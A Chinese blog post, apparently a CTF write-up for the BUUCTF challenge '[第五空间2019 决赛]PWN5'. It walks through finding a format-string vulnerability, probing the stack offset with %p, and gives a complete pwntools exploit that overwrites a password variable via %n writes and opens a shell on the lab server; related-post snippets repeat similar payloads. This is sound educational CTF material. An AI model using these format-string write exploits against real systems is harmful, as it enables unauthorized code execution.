【pwn】[第五空间2019 决赛]PWN5

最新推荐文章于 2024-04-11 16:24:58 发布
最新推荐文章于 2024-04-11 16:24:58 发布
阅读量239 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ethan18/article/details/131698869
版权

【pwn】[第五空间2019 决赛]PWN5


这是Buuctf的一道题,是我实战遇到的第一道格式字符串漏洞,在此记录。

首先进行老三样,对文件进行查看
在这里插入图片描述
在这里插入图片描述
发现都已经有Canary了,应该不是搞栈溢出的了
再看看ida
在这里插入图片描述
很明显,确实不是栈溢出,这都已经溢出不来了。
同时我们看到这里
在这里插入图片描述
输出字符串的printf函数里面直接输入了地址,表明是有格式字符串漏洞的。

格式字符串漏洞讲解看这里或者这里

同时我们查看main函数的逻辑(就是上面那个伪代码),可以看出,主要是需要让我们的passwd输入值和从文件中输入的值保持相同,但是很明显我们根本就不知道这个nptr变量是个啥。那么我们就想着有没有办法可以直接覆盖这个变量,然后进行passwd变量的输入,这两者一样就好了。

对于格式化字符串漏洞,我们首先要确定输入点是栈中的第几个参数。
输入

AAAA %p %p %p %p %p %p %p %p %p %p %p %p

可以得到结果
在这里插入图片描述
可以数出,0x41414141是格式化字符串的第10个参数,所以我们构造的时候就需要从%10$n开始进行覆盖

这里很重要的一点是运用%n,将输出的字符串的数量覆盖进所指向的位置。

我们找到储存密码的地方为0x0804C044,我们一个字节一个字节的存入,所以不能是直接用0x0804C044,而是是用四个地址0x0804C0440x0804C0450x0804C0460x0804C047
在这里插入图片描述

所以我们构造出exp

from pwn import *
							

p=remote('node4.buuoj.cn','29192')#连接远程靶机
			
payload=p32(0x0804C044)+p32(0x0804C045)+p32(0x0804C046)+p32(0x0804C047)    		
payload +=b"%10$n%11$n%12$n%13$n"

p.sendline(payload)#将payload发送给程序	
p.sendline(str(0x10101010))
				
p.interactive()#进入交互界面

得到flag

ethanyi9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
[第五空间2019 决赛]PWN5
m0_52231248的博客
11-02 87
[第五空间2019 决赛]PWN5 题目Ubuntu16,libc2.23 Checksec检查发现开启了canary和nx 进入main函数发现gets函数存在格式化字符串漏洞 并且程序会检查我们输入的password是否等于unk_804C044这个随机数,成功会直接给我们调用system(“/bin/sh”),因此我们检查unk_804C044位置发现位于bss段 接下来只要确认我们输入的数据到unk_804C044的偏移即可修改unk_804C044。 可以通过.%p或者gd
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 406
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
writeUP-[第五空间2019 决赛]PWN5(待进一步完善待研究内容)
weixin_52111404的博客
08-02 2217
通过PWN5一题尝试理解格式化字符串漏洞。
Buuctf[第五空间决赛2024]pwn5
最新发布
2401_83974345的博客
04-11 793
发现为32位2.ida32反编译从 /dev/urandom 中读取了四个字节的随机数,将其存储数据到unk_804c044所指向的内存,然后要求用户输入name和passwd。用户输入name后,它会直接将输入内容输出到屏幕上,然后要求用户输入passwd。程序将尝试将用户输入的passwd转换为整数,如果与之前生成的随机数相等,则输出"ok!!“并调用 /bin/sh执行 shell;否则输出"fail”发现存在格式化字符串漏洞3.“访问”构造Python脚本偏移量为10)
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1382
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
buuctf之[第五空间2019 决赛]PWN5
weixin_54452942的博客
04-01 608
简单易懂~
[CTF][第五空间2019 决赛]PWN5 1
凉水的博客
12-09 1107
解题思路 反编译后的源码: srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4320
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
[第五空间2019 决赛]PWN5 (字符串漏洞)——两种解法
qq_41696518的博客
07-13 2508
[第五空间2019 决赛]PWN5 ——两种解法
buuctf [第五空间2019 决赛]PWN5 1 wp
qq_45895967的博客
07-20 575
from pwn import* io=remote(‘node4.buuoj.cn’,29463) addr=0x0804C044 payload=p32(addr) payload+=’%10$n’ io.sendlineafter(‘name:’,payload) payload=str(0x4) io.sendlineafter(‘passwd:’,payload) io.interactive()
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 789
BUUCTF--pwn--[第五空间2019 决赛]PWN5
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值